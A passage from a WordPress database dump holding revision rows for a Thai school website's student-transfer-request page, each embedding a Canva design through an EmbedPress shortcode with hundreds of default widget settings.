_transform_translateX_effect_hover=\'false\' _transform_translateX_effect_hover_tablet=\'false\' _transform_translateX_effect_hover_mobile=\'false\' _transform_translateY_effect_hover=\'false\' _transform_translateY_effect_hover_tablet=\'false\' _transform_translateY_effect_hover_mobile=\'false\' _transform_scale_popover_hover=\'false\' _transform_keep_proportions_hover=\'yes\' _transform_scale_effect_hover=\'false\' _transform_scale_effect_hover_tablet=\'false\' _transform_scale_effect_hover_mobile=\'false\' _transform_scaleX_effect_hover=\'false\' _transform_scaleX_effect_hover_tablet=\'false\' _transform_scaleX_effect_hover_mobile=\'false\' _transform_scaleY_effect_hover=\'false\' _transform_scaleY_effect_hover_tablet=\'false\' _transform_scaleY_effect_hover_mobile=\'false\' _transform_skew_popover_hover=\'false\' _transform_skewX_effect_hover=\'false\' _transform_skewX_effect_hover_tablet=\'false\' _transform_skewX_effect_hover_mobile=\'false\' _transform_skewY_effect_hover=\'false\' _transform_skewY_effect_hover_tablet=\'false\' _transform_skewY_effect_hover_mobile=\'false\' _transform_flipX_effect_hover=\'false\' _transform_flipY_effect_hover=\'false\' motion_fx_transform_x_anchor_point=\'false\' motion_fx_transform_y_anchor_point=\'false\' _background_background=\'false\' _background_color=\'false\' _background_color_stop=\'false\' _background_color_b=\'false\' _background_color_b_stop=\'false\' _background_gradient_type=\'false\' _background_gradient_angle=\'false\' _background_gradient_position=\'false\' _background_image=\'false\' _background_position=\'false\' _background_xpos=\'false\' _background_ypos=\'false\' _background_attachment=\'false\' _background_repeat=\'false\' _background_size=\'false\' _background_bg_width=\'false\' _background_video_link=\'false\' _background_video_start=\'false\' _background_video_end=\'false\' _background_play_once=\'false\' _background_play_on_mobile=\'false\' _background_privacy_mode=\'false\' _background_video_fallback=\'false\' _background_slideshow_gallery=\'false\' _background_slideshow_loop=\'false\' _background_slideshow_slide_duration=\'false\' _background_slideshow_slide_transition=\'false\' _background_slideshow_transition_duration=\'false\' _background_slideshow_background_size=\'false\' _background_slideshow_background_position=\'false\' _background_slideshow_lazyload=\'false\' _background_slideshow_ken_burns=\'false\' _background_slideshow_ken_burns_zoom_direction=\'false\' _background_hover_background=\'false\' _background_hover_color=\'false\' _background_hover_color_stop=\'false\' _background_hover_color_b=\'false\' _background_hover_color_b_stop=\'false\' _background_hover_gradient_type=\'false\' _background_hover_gradient_angle=\'false\' _background_hover_gradient_position=\'false\' _background_hover_image=\'false\' _background_hover_position=\'false\' _background_hover_xpos=\'false\' _background_hover_ypos=\'false\' _background_hover_attachment=\'false\' _background_hover_repeat=\'false\' _background_hover_size=\'false\' _background_hover_bg_width=\'false\' _background_hover_video_link=\'false\' _background_hover_video_start=\'false\' _background_hover_video_end=\'false\' _background_hover_play_once=\'false\' _background_hover_play_on_mobile=\'false\' _background_hover_privacy_mode=\'false\' _background_hover_video_fallback=\'false\' _background_hover_slideshow_gallery=\'false\' _background_hover_slideshow_loop=\'false\' _background_hover_slideshow_slide_duration=\'false\' _background_hover_slideshow_slide_transition=\'false\' _background_hover_slideshow_transition_duration=\'false\' _background_hover_slideshow_background_size=\'false\' _background_hover_slideshow_background_position=\'false\' _background_hover_slideshow_lazyload=\'false\' _background_hover_slideshow_ken_burns=\'false\' _background_hover_slideshow_ken_burns_zoom_direction=\'false\' _border_border=\'false\' _border_width=\'false\' _border_color=\'false\' _box_shadow_box_shadow_type=\'false\' _box_shadow_box_shadow=\'false\' _box_shadow_box_shadow_position=\'false\' _border_hover_border=\'false\' _border_hover_width=\'false\' _border_hover_color=\'false\' _box_shadow_hover_box_shadow_type=\'false\' _box_shadow_hover_box_shadow=\'false\' _box_shadow_hover_box_shadow_position=\'false\' _mask_switch=\'false\' _mask_shape=\'false\' _mask_image=\'false\' _mask_notice=\'false\' _mask_size=\'false\' _mask_size_scale=\'false\' _mask_position=\'false\' _mask_position_x=\'false\' _mask_position_y=\'false\' _mask_repeat=\'false\' hide_desktop=\'false\' hide_tablet=\'false\' hide_mobile=\'false\']https://www.canva.com/design/DAGsEine2O0/Q6Wb_uxvDbumPForlKtMkQ/view[/embedpress]','ยื่นเรื่องย้ายนักเรียน','','inherit','closed','closed','','1623-revision-v1','','','2025-07-03 09:44:53','2025-07-03 02:44:53','',1623,'http://pakhaeng.ssk.in.th/?p=1632',0,'revision','',0),
(1633,1,'2025-07-03 09:44:53','2025-07-03 02:44:53','[embedpress embedpress_embeded_link=\'https://www.canva.com/design/DAGsEine2O0/Q6Wb_uxvDbumPForlKtMkQ/view\' prefix_nftcreator=\'false\' prefix_nftprice=\'false\' prefix_nftlastsale=\'false\' label_nftbutton=\'false\' loadmorelabel=\'false\' label_nftrank=\'false\' label_nftdetails=\'false\' instafeedFollowBtnLabel=\'false\' instafeedPostsCountText=\'false\' instafeedFollowersCountText=\'false\' instafeedPopupFollowBtnLabel=\'false\' instafeedLoadmoreLabel=\'false\' cPopupButtonText=\'false\' adWidth=\'false\' adHeight=\'false\' adStart=\'false\' adSkipButtonAfter=\'false\' embedpress_protection_message=\'false\' embedpress_lock_content_error_message=\'false\' embedpress_password_placeholder=\'false\' embedpress_submit_button_text=\'false\' embedpress_submit_Unlocking_text=\'false\' embedpress_lock_content_heading=\'false\' embedpress_lock_content_sub_heading=\'false\' embedpress_lock_content_footer_message=\'false\' width=\'1500\' height=\'519\' embedpress_pro_embeded_source=\'default\' instafeedFeedType=\'false\' instafeedAccountType=\'false\' embedpress_pro_embeded_nft_type=\'false\' embedpress_audio_video_auto_pause=\'false\' spotify_theme=\'false\' emberpress_custom_player=\'false\' custom_payer_preset=\'false\' embedpress_pro_video_start_time=\'false\' embedpress_pro_youtube_end_time=\'false\' embedpress_player_color=\'false\' embedpress_pro_vimeo_auto_play=\'false\' embedpress_pro_vimeo_autopause=\'false\' embedpress_pro_vimeo_dnt=\'false\' embedpress_pro_youtube_auto_play=\'false\' embedpress_pro_youtube_mute=\'false\' embedpress_pro_youtube_display_controls=\'false\' embedpress_pro_youtube_enable_fullscreen_button=\'false\' embedpress_pro_youtube_display_video_annotations=\'false\' embedpress_pro_youtube_progress_bar_color=\'false\' embedpress_pro_youtube_force_closed_captions=\'false\' embedpress_pro_youtube_modest_branding=\'false\' embepress_player_restart=\'false\' embepress_player_rewind=\'false\' embepress_player_fast_forward=\'false\' embepress_player_tooltip=\'false\' embepress_player_hide_controls=\'false\' embepress_player_download=\'false\' embepress_player_always_on_top=\'false\' embedpress_pro_youtube_display_related_videos=\'false\' embedpress_player_poster_thumbnail=\'false\' embedpress_pro_youtube_logo=\'false\' embedpress_pro_youtube_logo_size=\'false\' embedpress_pro_youtube_logo_custom_dimension=\'false\' embedpress_pro_youtube_logo_xpos=\'false\' embedpress_pro_youtube_logo_ypos=\'false\' embedpress_pro_youtube_logo_opacity=\'false\' embedpress_pro_youtube_logo_opacity_hover=\'false\' embedpress_pro_youtube_cta=\'false\' embedpress_pro_vimeo_color=\'false\' embedpress_pro_vimeo_display_title=\'false\' embedpress_pro_vimeo_display_author=\'false\' embedpress_pro_vimeo_avatar=\'false\' embedpress_pro_vimeo_loop=\'false\' embedpress_pro_vimeo_logo=\'false\' embedpress_pro_vimeo_logo_size=\'false\' embedpress_pro_vimeo_logo_custom_dimension=\'false\' embedpress_pro_vimeo_logo_xpos=\'false\' embedpress_pro_vimeo_logo_ypos=\'false\' embedpress_pro_vimeo_logo_opacity=\'false\' embedpress_pro_vimeo_logo_opacity_hover=\'false\' embedpress_pro_vimeo_cta=\'false\' embedpress_pro_wistia_auto_play=\'false\' embedpress_pro_wistia_color=\'false\' embedpress_pro_wistia_fullscreen_button=\'false\' embedpress_pro_wistia_small_play_button=\'false\' embedpress_pro_wistia_captions=\'false\' embedpress_pro_wistia_captions_enabled_by_default=\'false\' embedpress_pro_wistia_playbar=\'false\' embedpress_pro_wistia_volume_control=\'false\' embedpress_pro_wistia_volume=\'false\' embedpress_pro_wistia_logo=\'false\' embedpress_pro_wistia_logo_size=\'false\' embedpress_pro_wistia_logo_custom_dimension=\'false\' embedpress_pro_wistia_logo_xpos=\'false\' embedpress_pro_wistia_logo_ypos=\'false\' embedpress_pro_wistia_logo_opacity=\'false\' embedpress_pro_wistia_logo_opacity_hover=\'false\' embedpress_pro_wistia_cta=\'false\' embedpress_pro_soundcloud_visual=\'false\' embedpress_pro_soundcloud_color=\'false\' embedpress_pro_soundcloud_autoplay=\'false\' embedpress_pro_soundcloud_share_button=\'false\' embedpress_pro_soundcloud_comments=\'false\' embedpress_pro_soundcloud_artwork=\'false\' embedpress_pro_soundcloud_play_count=\'false\' embedpress_pro_soundcloud_user_name=\'false\' embedpress_pro_soundcloud_buy_button=\'false\' embedpress_pro_soundcloud_download_button=\'false\' embedpress_pro_dailymotion_ui_logo=\'false\' embedpress_pro_dailymotion_autoplay=\'false\' embedpress_pro_dailymotion_play_on_mobile=\'false\' embedpress_pro_dailymotion_mute=\'false\' embedpress_pro_dailymotion_player_control=\'false\' embedpress_pro_dailymotion_video_info=\'false\' embedpress_pro_dailymotion_control_color=\'false\' embedpress_pro_dailymotion_logo=\'false\' embedpress_pro_dailymotion_logo_size=\'false\' embedpress_pro_dailymotion_logo_custom_dimension=\'false\' embedpress_pro_dailymotion_logo_xpos=\'false\' embedpress_pro_dailymotion_logo_ypos=\'false\' embedpress_pro_dailymotion_logo_opacity=\'false\' embedpress_pro_dailymotion_logo_opacity_hover=\'false\' embedpress_pro_dailymotion_cta=\'false\' embedpress_pro_twitch_autoplay=\'false\' embedpress_pro_fs=\'false\' embedpress_pro_twitch_chat=\'false\' embedpress_pro_twitch_mute=\'false\' embedpress_pro_twitch_theme=\'false\' embedpress_pro_twitch_logo=\'false\' embedpress_pro_twitch_logo_size=\'false\' embedpress_pro_twitch_logo_custom_dimension=\'false\' embedpress_pro_twitch_logo_xpos=\'false\' embedpress_pro_twitch_logo_ypos=\'false\' embedpress_pro_twitch_logo_opacity=\'false\' embedpress_pro_twitch_logo_opacity_hover=\'false\' embedpress_pro_twitch_cta=\'false\' limit=\'false\' orderby=\'false\' ytChannelLayout=\'false\' pagesize=\'false\' columns=\'false\' gapbetweenvideos=\'false\' pagination=\'false\' yt_sub_channel=\'false\' yt_sub_text=\'false\' yt_sub_layout=\'false\' yt_sub_theme=\'false\' yt_sub_count=\'false\' yt_lc_show=\'false\' layout=\'false\' preset=\'false\' nftperrow=\'false\' gapbetweenitem=\'false\' collectionname=\'false\' nftimage=\'false\' nfttitle=\'false\' nftcreator=\'false\' nftprice=\'false\' nftlastsale=\'false\' nftbutton=\'false\' loadmore=\'false\' itemperpage=\'false\' nftrank=\'false\' nftdetails=\'false\' instafeedProfileImage=\'false\' instafeedProfileImageUrl=\'false\' instafeedFollowBtn=\'false\' instafeedPostsCount=\'false\' instafeedFollowersCount=\'false\' instafeedAccName=\'false\' instaLayout=\'false\' instafeedColumns=\'false\' instafeedColumnsGap=\'false\' embedpress_instafeed_slide_show=\'false\' embedpress_carousel_autoplay=\'false\' embedpress_carousel_autoplay_speed=\'false\' embedpress_carousel_transition_speed=\'false\' embedpress_carousel_loop=\'false\' embedpress_carousel_arrows=\'false\' embedpress_carousel_spacing=\'false\' instafeedPostsPerPage=\'false\' instafeedTab=\'false\' instafeedLikesCount=\'false\' instafeedCommentsCount=\'false\' instafeedPopup=\'false\' instafeedPopupFollowBtn=\'false\' instafeedLoadmore=\'false\' cEmbedType=\'false\' cPopupButtonTextColor=\'false\' cPopupButtonBGColor=\'false\' calendlyData=\'false\' hideCookieBanner=\'false\' hideEventTypeDetails=\'false\' cBackgroundColor=\'false\' cTextColor=\'false\' cButtonLinkColor=\'false\' theme=\'false\' color=\'false\' coverImageUrl=\'false\' hideDownload=\'false\' playlist=\'false\' playlistContinuous=\'false\' playlistLoop=\'false\' playlistAutoupdate=\'false\' hidePlaylistDescriptions=\'false\' hidePlaylistImages=\'false\' episodeImagePosition=\'false\' showChaptersImage=\'false\' hideLikes=\'false\' hideComments=\'false\' hideSharing=\'false\' hideLogo=\'false\' hideEpisodeDescription=\'false\' mode=\'false\' playerAutoplay=\'false\' delay=\'false\' repeat=\'false\' backgroundColor=\'false\' expiration=\'false\' adManager=\'false\' adSource=\'false\' adFileUrl=\'false\' adFileUrl1=\'false\' adXPosition=\'false\' adYPosition=\'false\' adUrl=\'false\' adSkipButton=\'false\' embedpress_lock_content=\'false\' embedpress_protection_type=\'false\' embedpress_select_roles=\'false\' embedpress_lock_content_password=\'false\' embedpress_enable_footer_message=\'false\' embedpress_content_share=\'false\' embedpress_content_share_position=\'false\' embedpress_content_title=\'false\' embedpress_content_descripiton=\'false\' embedpress_content_share_custom_thumbnail=\'false\' embedpress_share_facebook=\'false\' embedpress_share_twitter=\'false\' embedpress_share_pinterest=\'false\' embedpress_share_linkedin=\'false\' align=\'false\' align_tablet=\'false\' align_mobile=\'false\' nft_item_background_color=\'false\' nft_collectionname_color=\'false\' nft_collectionname_hover_color=\'false\' nft_collectionname_typography_typography=\'false\' nft_collectionname_typography_font_family=\'false\' nft_collectionname_typography_font_size=\'false\' nft_collectionname_typography_font_weight=\'false\' nft_collectionname_typography_text_transform=\'false\' nft_collectionname_typography_font_style=\'false\' nft_collectionname_typography_text_decoration=\'false\' nft_collectionname_typography_line_height=\'false\' nft_collectionname_typography_letter_spacing=\'false\' nft_collectionname_typography_word_spacing=\'false\' nft_title_color=\'false\' nft_title_typography_typography=\'false\' nft_title_typography_font_family=\'false\' nft_title_typography_font_size=\'false\' nft_title_typography_font_weight=\'false\' nft_title_typography_text_transform=\'false\' nft_title_typography_font_style=\'false\' nft_title_typography_text_decoration=\'false\' nft_title_typography_line_height=\'false\' nft_title_typography_letter_spacing=\'false\' nft_title_typography_word_spacing=\'false\' nft_creator_color=\'false\' nft_creator_typography_typography=\'false\' nft_creator_typography_font_family=\'false\' nft_creator_typography_font_size=\'false\' nft_creator_typography_font_weight=\'false\' nft_creator_typography_text_transform=\'false\' nft_creator_typography_font_style=\'false\' nft_creator_typography_text_decoration=\'false\' nft_creator_typography_line_height=\'false\' nft_creator_typography_letter_spacing=\'false\' nft_creator_typography_word_spacing=\'false\' nft_created_by_color=\'false\' nft_created_by_typography_typography=\'false\' nft_created_by_typography_font_family=\'false\' nft_created_by_typography_font_size=\'false\' nft_created_by_typography_font_weight=\'false\' nft_created_by_typography_text_transform=\'false\' nft_created_by_typography_font_style=\'false\' nft_created_by_typography_text_decoration=\'false\' nft_created_by_typography_line_height=\'false\' nft_created_by_typography_letter_spacing=\'false\' nft_created_by_typography_word_spacing=\'false\' nft_price_color=\'false\' nft_price_typography_typography=\'false\' nft_price_typography_font_family=\'false\' nft_price_typography_font_size=\'false\' nft_price_typography_font_weight=\'false\' nft_price_typography_text_transform=\'false\' nft_price_typography_font_style=\'false\' nft_price_typography_text_decoration=\'false\' nft_price_typography_line_height=\'false\' nft_price_typography_letter_spacing=\'false\' nft_price_typography_word_spacing=\'false\' nft_last_sale_color=\'false\' nft_last_sale_typography_typography=\'false\' nft_last_sale_typography_font_family=\'false\' nft_last_sale_typography_font_size=\'false\' nft_last_sale_typography_font_weight=\'false\' nft_last_sale_typography_text_transform=\'false\' nft_last_sale_typography_font_style=\'false\' nft_last_sale_typography_text_decoration=\'false\' nft_last_sale_typography_line_height=\'false\' nft_last_sale_typography_letter_spacing=\'false\' nft_last_sale_typography_word_spacing=\'false\' nftbutton_color=\'false\' nftbutton_bg_color=\'false\' nftbutton_typography_typography=\'false\' nftbutton_typography_font_family=\'false\' nftbutton_typography_font_size=\'false\' nftbutton_typography_font_weight=\'false\' nftbutton_typography_text_transform=\'false\' nftbutton_typography_font_style=\'false\' nftbutton_typography_text_decoration=\'false\' nftbutton_typography_line_height=\'false\' nftbutton_typography_letter_spacing=\'false\' nftbutton_typography_word_spacing=\'false\' nft_loadmore_color=\'false\' nft_loadmore_typography_typography=\'false\' nft_loadmore_typography_font_family=\'false\' nft_loadmore_typography_font_size=\'false\' nft_loadmore_typography_font_weight=\'false\' nft_loadmore_typography_text_transform=\'false\' nft_loadmore_typography_font_style=\'false\' nft_loadmore_typography_text_decoration=\'false\' nft_loadmore_typography_line_height=\'false\' nft_loadmore_typography_letter_spacing=\'false\' nft_loadmore_typography_word_spacing=\'false\' nft_loadmore_bgcolor=\'false\' nftrank_label_color=\'false\' nftrank_label_typography_typography=\'false\' nftrank_label_typography_font_family=\'false\' nftrank_label_typography_font_size=\'false\' nftrank_label_typography_font_weight=\'false\' nftrank_label_typography_text_transform=\'false\' nftrank_label_typography_font_style=\'false\' nftrank_label_typography_text_decoration=\'false\' nftrank_label_typography_line_height=\'false\' nftrank_label_typography_letter_spacing=\'false\' nftrank_label_typography_word_spacing=\'false\' nftrank_color=\'false\' nftrank_border_color=\'false\' nftrank_typography_typography=\'false\' nftrank_typography_font_family=\'false\' nftrank_typography_font_size=\'false\' nftrank_typography_font_weight=\'false\' nftrank_typography_text_transform=\'false\' nftrank_typography_font_style=\'false\' nftrank_typography_text_decoration=\'false\' nftrank_typography_line_height=\'false\' nftrank_typography_letter_spacing=\'false\' nftrank_typography_word_spacing=\'false\' nftdetail_title_color=\'false\' nftdetail_title_typography_typography=\'false\' nftdetail_title_typography_font_family=\'false\' nftdetail_title_typography_font_size=\'false\' nftdetail_title_typography_font_weight=\'false\' nftdetail_title_typography_text_transform=\'false\' nftdetail_title_typography_font_style=\'false\' nftdetail_title_typography_text_decoration=\'false\' nftdetail_title_typography_line_height=\'false\' nftdetail_title_typography_letter_spacing=\'false\' nftdetail_title_typography_word_spacing=\'false\' nftdetail_color=\'false\' nftdetail_typography_typography=\'false\' nftdetail_typography_font_family=\'false\' nftdetail_typography_font_size=\'false\' nftdetail_typography_font_weight=\'false\' nftdetail_typography_text_transform=\'false\' nftdetail_typography_font_style=\'false\' nftdetail_typography_text_decoration=\'false\' nftdetail_typography_line_height=\'false\' nftdetail_typography_letter_spacing=\'false\' nftdetail_typography_word_spacing=\'false\' nftdetail_link_color=\'false\' nftdetail_link_typography_typography=\'false\' nftdetail_link_typography_font_family=\'false\' nftdetail_link_typography_font_size=\'false\' nftdetail_link_typography_font_weight=\'false\' nftdetail_link_typography_text_transform=\'false\' nftdetail_link_typography_font_style=\'false\' nftdetail_link_typography_text_decoration=\'false\' nftdetail_link_typography_line_height=\'false\' nftdetail_link_typography_letter_spacing=\'false\' nftdetail_link_typography_word_spacing=\'false\' _title=\'false\' _element_width=\'false\' _element_width_tablet=\'false\' _element_width_mobile=\'false\' _element_custom_width=\'false\' _grid_column=\'false\' _grid_column_custom=\'false\' _grid_row=\'false\' _grid_row_custom=\'false\' _flex_align_self=\'false\' _flex_order=\'false\' _flex_order_custom=\'false\' _flex_size=\'false\' _flex_grow=\'false\' _flex_shrink=\'false\' _element_vertical_align=\'false\' _position=\'false\' _offset_orientation_h=\'false\' _offset_x=\'false\' _offset_x_end=\'false\' _offset_orientation_v=\'false\' _offset_y=\'false\' _offset_y_end=\'false\' _z_index=\'false\' _element_id=\'false\' _css_classes=\'false\' _element_cache=\'false\' _animation=\'false\' _animation_tablet=\'false\' _animation_mobile=\'false\' animation_duration=\'false\' _animation_delay=\'false\' _transform_rotate_popover=\'false\' _transform_rotateZ_effect=\'false\' _transform_rotateZ_effect_tablet=\'false\' _transform_rotateZ_effect_mobile=\'false\' _transform_rotate_3d=\'false\' _transform_rotateX_effect=\'false\' _transform_rotateX_effect_tablet=\'false\' _transform_rotateX_effect_mobile=\'false\' _transform_rotateY_effect=\'false\' _transform_rotateY_effect_tablet=\'false\' _transform_rotateY_effect_mobile=\'false\' _transform_perspective_effect=\'false\' _transform_perspective_effect_tablet=\'false\' _transform_perspective_effect_mobile=\'false\' _transform_translate_popover=\'false\' _transform_translateX_effect=\'false\' _transform_translateX_effect_tablet=\'false\' _transform_translateX_effect_mobile=\'false\' _transform_translateY_effect=\'false\' _transform_translateY_effect_tablet=\'false\' _transform_translateY_effect_mobile=\'false\' _transform_scale_popover=\'false\' _transform_keep_proportions=\'yes\' _transform_scale_effect=\'false\' _transform_scale_effect_tablet=\'false\' _transform_scale_effect_mobile=\'false\' _transform_scaleX_effect=\'false\' _transform_scaleX_effect_tablet=\'false\' _transform_scaleX_effect_mobile=\'false\' _transform_scaleY_effect=\'false\' _transform_scaleY_effect_tablet=\'false\' _transform_scaleY_effect_mobile=\'false\' _transform_skew_popover=\'false\' _transform_skewX_effect=\'false\' _transform_skewX_effect_tablet=\'false\' _transform_skewX_effect_mobile=\'false\' _transform_skewY_effect=\'false\' _transform_skewY_effect_tablet=\'false\' _transform_skewY_effect_mobile=\'false\' _transform_flipX_effect=\'false\' _transform_flipY_effect=\'false\' _transform_rotate_popover_hover=\'false\' _transform_rotateZ_effect_hover=\'false\' _transform_rotateZ_effect_hover_tablet=\'false\' _transform_rotateZ_effect_hover_mobile=\'false\' _transform_rotate_3d_hover=\'false\' _transform_rotateX_effect_hover=\'false\' _transform_rotateX_effect_hover_tablet=\'false\' _transform_rotateX_effect_hover_mobile=\'false\' _transform_rotateY_effect_hover=\'false\' _transform_rotateY_effect_hover_tablet=\'false\' _transform_rotateY_effect_hover_mobile=\'false\' _transform_perspective_effect_hover=\'false\' _transform_perspective_effect_hover_tablet=\'false\' _transform_perspective_effect_hover_mobile=\'false\' _transform_translate_popover_hover=\'false\' _transform_translateX_effect_hover=\'false\' _transform_translateX_effect_hover_tablet=\'false\' _transform_translateX_effect_hover_mobile=\'false\' _transform_translateY_effect_hover=\'false\' _transform_translateY_effect_hover_tablet=\'false\' _transform_translateY_effect_hover_mobile=\'false\' _transform_scale_popover_hover=\'false\' _transform_keep_proportions_hover=\'yes\' _transform_scale_effect_hover=\'false\' _transform_scale_effect_hover_tablet=\'false\' _transform_scale_effect_hover_mobile=\'false\' _transform_scaleX_effect_hover=\'false\' _transform_scaleX_effect_hover_tablet=\'false\' _transform_scaleX_effect_hover_mobile=\'false\' _transform_scaleY_effect_hover=\'false\' _transform_scaleY_effect_hover_tablet=\'false\' _transform_scaleY_effect_hover_mobile=\'false\' _transform_skew_popover_hover=\'false\' _transform_skewX_effect_hover=\'false\' _transform_skewX_effect_hover_tablet=\'false\' _transform_skewX_effect_hover_mobile=\'false\' _transform_skewY_effect_hover=\'false\' _transform_skewY_effect_hover_tablet=\'false\' _transform_skewY_effect_hover_mobile=\'false\' _transform_flipX_effect_hover=\'false\' _transform_flipY_effect_hover=\'false\' motion_fx_transform_x_anchor_point=\'false\' motion_fx_transform_y_anchor_point=\'false\' _background_background=\'false\' _background_color=\'false\' _background_color_stop=\'false\' _background_color_b=\'false\' _background_color_b_stop=\'false\' _background_gradient_type=\'false\' _background_gradient_angle=\'false\' _background_gradient_position=\'false\' _background_image=\'false\' _background_position=\'false\' _background_xpos=\'false\' _background_ypos=\'false\' _background_attachment=\'false\' _background_repeat=\'false\' _background_size=\'false\' _background_bg_width=\'false\' _background_video_link=\'false\' _background_video_start=\'false\' _background_video_end=\'false\' _background_play_once=\'false\' _background_play_on_mobile=\'false\' _background_privacy_mode=\'false\' _background_video_fallback=\'false\' _background_slideshow_gallery=\'false\' _background_slideshow_loop=\'false\' _background_slideshow_slide_duration=\'false\' _background_slideshow_slide_transition=\'false\' _background_slideshow_transition_duration=\'false\' _background_slideshow_background_size=\'false\' _background_slideshow_background_position=\'false\' _background_slideshow_lazyload=\'false\' _background_slideshow_ken_burns=\'false\' _background_slideshow_ken_burns_zoom_direction=\'false\' _background_hover_background=\'false\' _background_hover_color=\'false\' _background_hover_color_stop=\'false\' _background_hover_color_b=\'false\' _background_hover_color_b_stop=\'false\' _background_hover_gradient_type=\'false\' _background_hover_gradient_angle=\'false\' _background_hover_gradient_position=\'false\' _background_hover_image=\'false\' _background_hover_position=\'false\' _background_hover_xpos=\'false\' _background_hover_ypos=\'false\' _background_hover_attachment=\'false\' _background_hover_repeat=\'false\' _background_hover_size=\'false\' _background_hover_bg_width=\'false\' _background_hover_video_link=\'false\' _background_hover_video_start=\'false\' _background_hover_video_end=\'false\' _background_hover_play_once=\'false\' _background_hover_play_on_mobile=\'false\' _background_hover_privacy_mode=\'false\' _background_hover_video_fallback=\'false\' _background_hover_slideshow_gallery=\'false\' _background_hover_slideshow_loop=\'false\' _background_hover_slideshow_slide_duration=\'false\' _background_hover_slideshow_slide_transition=\'false\' _background_hover_slideshow_transition_duration=\'false\' _background_hover_slideshow_background_size=\'false\' _background_hover_slideshow_background_position=\'false\' _background_hover_slideshow_lazyload=\'false\' _background_hover_slideshow_ken_burns=\'false\' _background_hover_slideshow_ken_burns_zoom_direction=\'false\' _border_border=\'false\' _border_width=\'false\' _border_color=\'false\' _box_shadow_box_shadow_type=\'false\' _box_shadow_box_shadow=\'false\' _box_shadow_box_shadow_position=\'false\' _border_hover_border=\'false\' _border_hover_width=\'false\' _border_hover_color=\'false\' _box_shadow_hover_box_shadow_type=\'false\' _box_shadow_hover_box_shadow=\'false\' _box_shadow_hover_box_shadow_position=\'false\' _mask_switch=\'false\' _mask_shape=\'false\' _mask_image=\'false\' _mask_notice=\'false\' _mask_size=\'false\' _mask_size_scale=\'false\' _mask_position=\'false\' _mask_position_x=\'false\' _mask_position_y=\'false\' _mask_repeat=\'false\' hide_desktop=\'false\' hide_tablet=\'false\' hide_mobile=\'false\']https://www.canva.com/design/DAGsEine2O0/Q6Wb_uxvDbumPForlKtMkQ/view[/embedpress]','ยื่นเรื่องย้ายนักเรียน','','inherit','closed','closed','','1623-revision-v1','','','2025-07-03 09:44:53','2025-07-03 02:44:53','',1623,'http://pakhaeng.ssk.in.th/?p=1633',0,'revision','',0),
(1634,1,'2025-07-03 09:44:53','2025-07-03 02:44:53','[embedpress embedpress_embeded_link=\'https://www.canva.com/design/DAGsEine2O0/Q6Wb_uxvDbumPForlKtMkQ/view\' prefix_nftcreator=\'false\' prefix_nftprice=\'false\' prefix_nftlastsale=\'false\' label_nftbutton=\'false\' loadmorelabel=\'false\' label_nftrank=\'false\' label_nftdetails=\'false\' instafeedFollowBtnLabel=\'false\' instafeedPostsCountText=\'false\' instafeedFollowersCountText=\'false\' instafeedPopupFollowBtnLabel=\'false\' instafeedLoadmoreLabel=\'false\' cPopupButtonText=\'false\' adWidth=\'false\' adHeight=\'false\' adStart=\'false\' adSkipButtonAfter=\'false\' embedpress_protection_message=\'false\' embedpress_lock_content_error_message=\'false\' embedpress_password_placeholder=\'false\' embedpress_submit_button_text=\'false\' embedpress_submit_Unlocking_text=\'false\' embedpress_lock_content_heading=\'false\' embedpress_lock_content_sub_heading=\'false\' embedpress_lock_content_footer_message=\'false\' width=\'1500\' width_tablet=\'867\' height=\'519\' height_mobile=\'167\' align=\'center\' _element_width=\'initial\' _element_custom_width=\'100\' embedpress_pro_embeded_source=\'default\' instafeedFeedType=\'false\' instafeedAccountType=\'false\' embedpress_pro_embeded_nft_type=\'false\' embedpress_audio_video_auto_pause=\'false\' spotify_theme=\'false\' emberpress_custom_player=\'false\' custom_payer_preset=\'false\' embedpress_pro_video_start_time=\'false\' embedpress_pro_youtube_end_time=\'false\' embedpress_player_color=\'false\' embedpress_pro_vimeo_auto_play=\'false\' embedpress_pro_vimeo_autopause=\'false\' embedpress_pro_vimeo_dnt=\'false\' embedpress_pro_youtube_auto_play=\'false\' embedpress_pro_youtube_mute=\'false\' embedpress_pro_youtube_display_controls=\'false\' embedpress_pro_youtube_enable_fullscreen_button=\'false\' embedpress_pro_youtube_display_video_annotations=\'false\' embedpress_pro_youtube_progress_bar_color=\'false\' embedpress_pro_youtube_force_closed_captions=\'false\' embedpress_pro_youtube_modest_branding=\'false\' embepress_player_restart=\'false\' embepress_player_rewind=\'false\' embepress_player_fast_forward=\'false\' embepress_player_tooltip=\'false\' embepress_player_hide_controls=\'false\' embepress_player_download=\'false\' embepress_player_always_on_top=\'false\' embedpress_pro_youtube_display_related_videos=\'false\' embedpress_player_poster_thumbnail=\'false\' embedpress_pro_youtube_logo=\'false\' embedpress_pro_youtube_logo_size=\'false\' embedpress_pro_youtube_logo_custom_dimension=\'false\' embedpress_pro_youtube_logo_xpos=\'false\' embedpress_pro_youtube_logo_ypos=\'false\' embedpress_pro_youtube_logo_opacity=\'false\' embedpress_pro_youtube_logo_opacity_hover=\'false\' embedpress_pro_youtube_cta=\'false\' embedpress_pro_vimeo_color=\'false\' embedpress_pro_vimeo_display_title=\'false\' embedpress_pro_vimeo_display_author=\'false\' embedpress_pro_vimeo_avatar=\'false\' embedpress_pro_vimeo_loop=\'false\' embedpress_pro_vimeo_logo=\'false\' embedpress_pro_vimeo_logo_size=\'false\' embedpress_pro_vimeo_logo_custom_dimension=\'false\' embedpress_pro_vimeo_logo_xpos=\'false\' embedpress_pro_vimeo_logo_ypos=\'false\' embedpress_pro_vimeo_logo_opacity=\'false\' embedpress_pro_vimeo_logo_opacity_hover=\'false\' embedpress_pro_vimeo_cta=\'false\' embedpress_pro_wistia_auto_play=\'false\' embedpress_pro_wistia_color=\'false\' embedpress_pro_wistia_fullscreen_button=\'false\' embedpress_pro_wistia_small_play_button=\'false\' embedpress_pro_wistia_captions=\'false\' embedpress_pro_wistia_captions_enabled_by_default=\'false\' embedpress_pro_wistia_playbar=\'false\' embedpress_pro_wistia_volume_control=\'false\' embedpress_pro_wistia_volume=\'false\' embedpress_pro_wistia_logo=\'false\' embedpress_pro_wistia_logo_size=\'false\' embedpress_pro_wistia_logo_custom_dimension=\'false\' embedpress_pro_wistia_logo_xpos=\'false\' embedpress_pro_wistia_logo_ypos=\'false\' embedpress_pro_wistia_logo_opacity=\'false\' embedpress_pro_wistia_logo_opacity_hover=\'false\' embedpress_pro_wistia_cta=\'false\' embedpress_pro_soundcloud_visual=\'false\' embedpress_pro_soundcloud_color=\'false\' embedpress_pro_soundcloud_autoplay=\'false\' embedpress_pro_soundcloud_share_button=\'false\' 